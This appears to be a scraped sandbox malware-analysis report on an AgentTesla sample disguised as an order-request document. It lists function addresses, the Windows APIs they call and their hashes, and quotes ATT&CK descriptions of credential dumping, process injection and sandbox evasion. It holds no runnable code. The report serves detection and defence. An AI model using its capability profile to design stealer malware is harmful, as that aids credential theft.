Function 0137B768 Relevance: 1.7, APIs: 1, Instructions: 180
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0137B7A9

Memory Dump Source

Source File: 00000097.00000002.67424855364.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7d04ffdecfb0bdb33120ffd360abfb1a57e28ec5dad94e23310a6df7b39becb
Instruction ID: c1bd772e34ae4385e4cfd070bab6da2fa9c4aa3612df6da19b3a17d9a2499c09
Opcode Fuzzy Hash: f7d04ffdecfb0bdb33120ffd360abfb1a57e28ec5dad94e23310a6df7b39becb
Instruction Fuzzy Hash: EB616034A10319DFDB24DF74D498BAEBAF1AF85249F108428E41297398DF78A845CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0137BFA8 Relevance: 1.6, APIs: 1, Instructions: 138
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0137C007

Memory Dump Source

Source File: 00000097.00000002.67424855364.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31526903c293775e54f4a465d9d225d36f193d343057b1d9a61002a2e383e820
Instruction ID: c73d430bbdb608249969e2deff2e8ad6fdc0ad35a86f3dbb1b4f783ba2866d2c
Opcode Fuzzy Hash: 31526903c293775e54f4a465d9d225d36f193d343057b1d9a61002a2e383e820
Instruction Fuzzy Hash: 46419271B402059BCB14EFB4D888E9EB7F5AF89208F148939E522DB351DB70EC148B91

Uniqueness

Uniqueness Score: -1.00%

Function 01543C90 Relevance: 1.6, APIs: 1, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ad4c0e754b9987e26303e271e22a896b28f3a894a31107a4003e5bee9b8fc55
Instruction ID: 789bf5deb39475487dd09f82cc3901ed9fd5d3091c6743aa199b924dd395e18b
Opcode Fuzzy Hash: 2ad4c0e754b9987e26303e271e22a896b28f3a894a31107a4003e5bee9b8fc55
Instruction Fuzzy Hash: C7410F32E043559FDB04CFA9C4446EEBBF0BF89324F15856ED548AB251DB389845CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 1D3067ED Relevance: 1.6, APIs: 1, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D30690A

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ab65f36f786f21e5fe754cf84a25e7e4a1bf7e495b69fa34dc9d1c450972f794
Instruction ID: 571741374bd6b7c14917c260a034f9da643aac9c81c60f0fc9705db6bc0d4b08
Opcode Fuzzy Hash: ab65f36f786f21e5fe754cf84a25e7e4a1bf7e495b69fa34dc9d1c450972f794
Instruction Fuzzy Hash: 1D51C3B1D002499FDF14CF99D884ADEBBB5BF88310F24822EE819AB214D7709945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0149F0A8 Relevance: 1.6, APIs: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0149F1C1

Memory Dump Source

Source File: 00000097.00000002.67425499980.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2f4ce9e5966d837b71ba6423ed6d88515b8cf9819137548eaabdab512903ea52
Instruction ID: 01cd0aafd5956060a8d26d16ad7c7426e8269da7d5d0d8be3ab11452a846077f
Opcode Fuzzy Hash: 2f4ce9e5966d837b71ba6423ed6d88515b8cf9819137548eaabdab512903ea52
Instruction Fuzzy Hash: 5F4159B1E042599FCB10CFA9C884A9EBFF5AF49314F15806AE918EB361D7749C09CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1D3067F8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D30690A

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 763a7367cdd12fdc179a69c9c34ec38965e5359dd1716dd50fd55c61afe8a58a
Instruction ID: 2794e160c64bcdc52893f168077115ba1bb05c8737bab9e368b01a9639ff734d
Opcode Fuzzy Hash: 763a7367cdd12fdc179a69c9c34ec38965e5359dd1716dd50fd55c61afe8a58a
Instruction Fuzzy Hash: 0441A0B1D00249DFDB14CF99C884ADEBBB5BF88314F24822AE819AB214D775A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1D30A4DA Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D30A5D7

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: bd7d272a66e3d8466004bcd249798657cef49d3e17ceeb21a42bfc8ee7146796
Instruction ID: d6db60b1cba1fbe350c7495c758c32ff3c4b4d035cdcabefd257dfe5728a629a
Opcode Fuzzy Hash: bd7d272a66e3d8466004bcd249798657cef49d3e17ceeb21a42bfc8ee7146796
Instruction Fuzzy Hash: 8F416A769002489FCF01CF99D884AEEBBF9FF48220F14815AE955E7251C335AA15CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D30A144 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1D30B4D9

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: dc836c0a5af093788fc56cb888f97d904e38e6e54d1dc50b0f53e624576079ca
Instruction ID: 3ee575e6c3ac4a8593a21a59c36f8e990baa618590c164eda43fe07a3560ff13
Opcode Fuzzy Hash: dc836c0a5af093788fc56cb888f97d904e38e6e54d1dc50b0f53e624576079ca
Instruction Fuzzy Hash: 6B4158B4900249CFCB08CF89C488AAAFBF5FF89314F25C569D519AB321D734A941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F0EB4F Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00F0EB59

Memory Dump Source

Source File: 00000097.00000002.67422557539.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: be261e5b0bc196221b5f251d0a4a187f856ebd3568990b462c7f98fbfbf6a592
Instruction ID: c74e2525078b671c2757552fbe949361ac91aa10c8cd796f4932e4aab31b68cb
Opcode Fuzzy Hash: be261e5b0bc196221b5f251d0a4a187f856ebd3568990b462c7f98fbfbf6a592
Instruction Fuzzy Hash: FD31582654838947CF355E384C983DB3BA38F63660F9982AECCD41B1D9E334484AD607

Uniqueness

Uniqueness Score: -1.00%

Function 0149A0E8 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0149F1C1

Memory Dump Source

Source File: 00000097.00000002.67425499980.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7199c9e50df33717eb106c9c66c1ce523df9e6ec0b710f9ac5c901376324c3a7
Instruction ID: e8024a694cd3ecc22b09174daae1b652771df65845ed45b8a0d0aa9df14b55ce
Opcode Fuzzy Hash: 7199c9e50df33717eb106c9c66c1ce523df9e6ec0b710f9ac5c901376324c3a7
Instruction Fuzzy Hash: 2331D1B1D002589FCB10CF9AC984A9EFFF5BF49314F15806AE819AB314D770A949CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0149EE45 Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0149EF04

Memory Dump Source

Source File: 00000097.00000002.67425499980.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b5cf2563102945538bf1ae5016605af2949f5aac4ba996edf084fc033b6cfc3a
Instruction ID: db07cda0fcffb4e159b1abd68315513bd001688242b29b7b7cd08891cbc299e1
Opcode Fuzzy Hash: b5cf2563102945538bf1ae5016605af2949f5aac4ba996edf084fc033b6cfc3a
Instruction Fuzzy Hash: C831FFB0D002899FDB14CF98C588A9EFFF1BF48304F28816EE809AB355C775A945CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0149A0DC Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0149EF04

Memory Dump Source

Source File: 00000097.00000002.67425499980.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 706b2c933ddebff3e4e46e77ef6452b59d4f866e54d511213e18ce8a525a840f
Instruction ID: 8007ed711cca147517702336395c94e9cdf46cbcb825a6d0ad24f147a8320ca6
Opcode Fuzzy Hash: 706b2c933ddebff3e4e46e77ef6452b59d4f866e54d511213e18ce8a525a840f
Instruction Fuzzy Hash: A93101B0D052899FDB14CF99C588A8EFFF1BF48304F28816EE509AB355C7759945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0137B70A Relevance: 1.6, APIs: 1, Instructions: 82libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0137B7A9

Memory Dump Source

Source File: 00000097.00000002.67424855364.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 60795ff10310429f99b88c79eecc555614efa2ae97cc5e60b0923a00394153f5
Instruction ID: 7e2eb492feb6db5ec0619aa94a6b109a6550ace9361d6ab9d2580619cd93ac20
Opcode Fuzzy Hash: 60795ff10310429f99b88c79eecc555614efa2ae97cc5e60b0923a00394153f5
Instruction Fuzzy Hash: C431F430A04308DFC715DF78C498B9EBBB1FF8A308F11C869E010AB29ADB399845CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1D30A550 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D30A5D7

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 33949aabcb6f7acb71a670f159c716a0608b4d4e11640da5705e429efa181ba4
Instruction ID: b2faa561e7671a2f5791877fab5d94289869fb98942537aab5d431d73c5b7420
Opcode Fuzzy Hash: 33949aabcb6f7acb71a670f159c716a0608b4d4e11640da5705e429efa181ba4
Instruction Fuzzy Hash: 0421E2B59002489FDB10CFAAD884AEEFBF4FB48314F14842AE959A3310D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01548158 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 015498D6

Memory Dump Source

Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 77976ef9959ef322e76c1d6c2a0db205c758e479c12a9d2fb8d53892371d3122
Instruction ID: 787374e74753cdbd5387665d22eee3bdf7c748deb82a969dd1e9caf2b72ee139
Opcode Fuzzy Hash: 77976ef9959ef322e76c1d6c2a0db205c758e479c12a9d2fb8d53892371d3122
Instruction Fuzzy Hash: 42210FB5D002499FEB14CF9AC485AAEFBB4BB89218F14852ED519AB600C774A904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0154C6F0 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,0154C6D1,00000800), ref: 0154C762

Memory Dump Source

Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2360ce98521e0385165e440da22f7aa075c5975879b6609ebece76cb812c608f
Instruction ID: d4a8ff85f668e0c7562cefeb95e491833bde90173cc4a05d89f476ffdc290961
Opcode Fuzzy Hash: 2360ce98521e0385165e440da22f7aa075c5975879b6609ebece76cb812c608f
Instruction Fuzzy Hash: 4F2103B59002498FDB10CF9AC884BEEFBF5AB89314F14852ED919AB600C375A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01549858 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

FindWindowW.USER32(00000000,00000000), ref: 015498D6

Memory Dump Source

Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID: FindWindow
String ID:
API String ID: 134000473-0
Opcode ID: 6083329bc4f898b8135a8e69a3db5dfa34e0eea044043ac34ccb2b90e32e7da9
Instruction ID: 030c3dc733397b59c746fdd4d824c571db159efc774866be6db1762232e4f726
Opcode Fuzzy Hash: 6083329bc4f898b8135a8e69a3db5dfa34e0eea044043ac34ccb2b90e32e7da9
Instruction Fuzzy Hash: 052102B5C002098FDB14CF9AC485ADEFBB4FB89328F14852ED419AB600C3746544CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0154B43C Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,0154C6D1,00000800), ref: 0154C762

Memory Dump Source

Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9777faf98521fbe3985e7ac80f977bf7efb42d7de8be0241568de99f68a69d22
Instruction ID: 789f6cd658b3b690e914ab5eee2571b779cae3dd689e783bd9dc1c3d069a6718
Opcode Fuzzy Hash: 9777faf98521fbe3985e7ac80f977bf7efb42d7de8be0241568de99f68a69d22
Instruction Fuzzy Hash: 601114B59012498FDB10CF9AC444BEEFBF4FB89314F14842ED919AB600C774A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0154097C Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,01543CE2), ref: 01543DCF

Memory Dump Source

Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 90ff40f4145406379b9ef0c75f2276169e8661b0aaf7ca1b3416fbfdd87f81c0
Instruction ID: 36b4e952bc26bffe54393f7a759244a64f6337751551aaf26395cf294c40a3c3
Opcode Fuzzy Hash: 90ff40f4145406379b9ef0c75f2276169e8661b0aaf7ca1b3416fbfdd87f81c0
Instruction Fuzzy Hash: 701133B1C006599BCB10CF9AC444BAEFBF4BF48224F05852AD918A7740D778A904CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 1D305349 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1D3053B6

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 735fa51c4a694c26e0c739b35550f705443de68871d5cfc5078367be27fd77e9
Instruction ID: accf46217bce06459c4828129e64e4d667dd0e2fb5c82a9ca32562de8936034b
Opcode Fuzzy Hash: 735fa51c4a694c26e0c739b35550f705443de68871d5cfc5078367be27fd77e9
Instruction Fuzzy Hash: 5C1102B5C003498FDB10CF9AD444BDEFBF8AF89324F10856AD569A7600D374A545CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D3037C8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 1D3053B6

Memory Dump Source

Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ca8a9753c29019d91d50fed940bf05996531ddc1988ddbdfc3fc1b53cd0a2585
Instruction ID: 13da67054a25f6402dcad1e1b1fcf847f973d064120f13dcd0aec11f40c93b6a
Opcode Fuzzy Hash: ca8a9753c29019d91d50fed940bf05996531ddc1988ddbdfc3fc1b53cd0a2585
Instruction Fuzzy Hash: C21132B5C003498FCB10CF9AC444B9EFBF8AB89314F10856AD929B7700C3B4A905CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D24D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000097.00000002.67441647808.000000001D24D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D24D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ba321d05380440989e3acaef97c0f39bc4be0efa22fb4d2284c69633ff5205
Instruction ID: 60a663daac4fed5b9abbc8903616b579afe866db5d051d105e888f4ae279e106
Opcode Fuzzy Hash: 60ba321d05380440989e3acaef97c0f39bc4be0efa22fb4d2284c69633ff5205
Instruction Fuzzy Hash: 81212275644245EFDB09CF18D9C0B16BB65FB88724F30C1ADED094B246C33AE856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D25D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000097.00000002.67441789827.000000001D25D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D25D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7097e86f83ff782a049a4afa1afd24ff224fa22e68f6d18c5f35068fa0455d5
Instruction ID: d3dc33bc86d0fdb8984efb1820cdf0031c0808f05d00ea206a8f5f48620f4366
Opcode Fuzzy Hash: e7097e86f83ff782a049a4afa1afd24ff224fa22e68f6d18c5f35068fa0455d5
Instruction Fuzzy Hash: 9121D075648240EFDB05DF28D9C4F56BB61FB84724F20C669D9094B246C73AD807CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D25D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000097.00000002.67441789827.000000001D25D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D25D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e68d16868a8cfef7cbe2dc8704a4d5b0cc34ac0988f409a7c8d4096363cabff7
Instruction ID: 184a16f3f3180b959160df064e9669ce3785fb560c2a0f1323d266b01dd2913c
Opcode Fuzzy Hash: e68d16868a8cfef7cbe2dc8704a4d5b0cc34ac0988f409a7c8d4096363cabff7
Instruction Fuzzy Hash: 4E217C755493808FC702CF24D990B15BF71EB46314F28C6AAD8498B696C33A940ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D24D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000097.00000002.67441647808.000000001D24D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D24D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e654eb442871bd16356cd44a35090ba02911d9a72e1fd483032b2ec6c6171378
Instruction ID: 21d69529dbcd28436bdb61acf5518709eec0132e5708631876bb27df958b7d5b
Opcode Fuzzy Hash: e654eb442871bd16356cd44a35090ba02911d9a72e1fd483032b2ec6c6171378
Instruction Fuzzy Hash: E2119A76544281DFCB06CF14D9C4B16BF72FB84324F34C6A9D8090B656C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

